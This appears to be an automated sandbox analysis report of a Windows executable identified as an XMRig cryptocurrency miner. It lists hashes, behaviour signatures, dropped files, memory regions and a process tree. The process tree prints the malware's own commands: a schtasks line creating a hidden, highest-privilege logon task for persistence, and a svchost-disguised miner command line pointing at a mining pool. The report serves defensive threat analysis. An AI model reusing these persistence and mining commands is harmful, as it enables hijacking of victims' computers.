Analysis

  • max time kernel
    145s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2023 11:39

General

  • Target

    1759934f36d5b85357c3b319f35b0432.exe

  • Size

    110KB

  • MD5

    1759934f36d5b85357c3b319f35b0432

  • SHA1

    f634a290bcfbc526f0d80868c8acc82b8f7bbf2e

  • SHA256

    315cd7ebf75f6804614a07de69c8f5c6e9f6ef9eaeaf86b8efbeaca69c48d641

  • SHA512

    1a16656380ec06f6f1a64e53fbdda09dcf15587cf2d4464eb92f3089a90205c605971ee02b9cbc48d95f9417769eb2a0217e4639e0131420522ec31f9152d152

  • SSDEEP

    1536:UpXwmYTU4I1KLmY0BRxoOXBZVFfxUlYlI7oDF/WH:OwmyU4+xoOXRFfTF/G

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 5 IoCs
  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1759934f36d5b85357c3b319f35b0432.exe
    "C:\Users\Admin\AppData\Local\Temp\1759934f36d5b85357c3b319f35b0432.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:2668
    • C:\Users\Admin\AppData\Local\Temp\services64.exe
      "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1292
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:2592
      • C:\Windows\System32\svchost.exe
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=60 --cinit-idle-wait=5 --cinit-idle-cpu=60
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1736

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

    Filesize

    7KB

    MD5

    9493e3d01cce271cf1ffeb0dd0e252fb

    SHA1

    4cfe3799e73d7117a0f0c85f451602e5f5168ad3

    SHA256

    10da2245652c5674010ad225d9f1e448918838c44916700dff558ef03e068de2

    SHA512

    2a7a22a167c2cc5c3045cb3065efda938974f1c95b5f481b11d5aed21a37a81f39b2f5b6aea1fbf06925dd18127fa380d4f020dd5d76c347acee8a9b9a8a0794

  • \Users\Admin\AppData\Local\Temp\services64.exe

    Filesize

    110KB

    MD5

    1759934f36d5b85357c3b319f35b0432

    SHA1

    f634a290bcfbc526f0d80868c8acc82b8f7bbf2e

    SHA256

    315cd7ebf75f6804614a07de69c8f5c6e9f6ef9eaeaf86b8efbeaca69c48d641

    SHA512

    1a16656380ec06f6f1a64e53fbdda09dcf15587cf2d4464eb92f3089a90205c605971ee02b9cbc48d95f9417769eb2a0217e4639e0131420522ec31f9152d152

  • memory/1728-1-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/1728-2-0x000000001B4A0000-0x000000001B520000-memory.dmp

    Filesize

    512KB

  • memory/1728-3-0x0000000000660000-0x000000000066E000-memory.dmp

    Filesize

    56KB

  • memory/1728-0-0x000000013F150000-0x000000013F170000-memory.dmp

    Filesize

    128KB

  • memory/1728-12-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/1736-39-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

    Filesize

    4KB

  • memory/1736-34-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-52-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-48-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-50-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-49-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-51-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-47-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-27-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-28-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-29-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-30-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-31-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-32-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-33-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-46-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-35-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-37-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-36-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-38-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-45-0x00000000000F0000-0x0000000000110000-memory.dmp

    Filesize

    128KB

  • memory/1736-41-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/1736-44-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/2592-25-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/2592-24-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/2592-21-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/2592-20-0x000000013F530000-0x000000013F536000-memory.dmp

    Filesize

    24KB

  • memory/2840-43-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/2840-10-0x000000013F920000-0x000000013F940000-memory.dmp

    Filesize

    128KB

  • memory/2840-11-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB

  • memory/2840-23-0x0000000002310000-0x0000000002390000-memory.dmp

    Filesize

    512KB

  • memory/2840-22-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp

    Filesize

    9.9MB